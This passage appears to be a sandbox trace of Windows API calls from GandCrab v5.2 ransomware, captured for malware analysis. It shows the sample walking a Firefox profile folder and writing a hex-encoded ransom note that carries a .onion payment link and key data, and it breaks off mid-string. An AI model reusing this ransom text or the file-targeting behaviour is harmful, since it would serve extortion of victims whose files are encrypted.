0x5035b8 [0084.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.394] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0084.394] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.394] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.394] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0084.394] lstrcmpW (lpString1="chrome", lpString2=".") returned 1 [0084.394] lstrcmpW (lpString1="chrome", lpString2="..") returned 1 [0084.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="chrome" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" [0084.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\" [0084.394] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.394] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.395] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.395] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.395] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.395] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.395] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.395] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.396] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\\\TITWMVJL-DECRYPT.txt") returned 126 [0084.396] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0084.397] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x3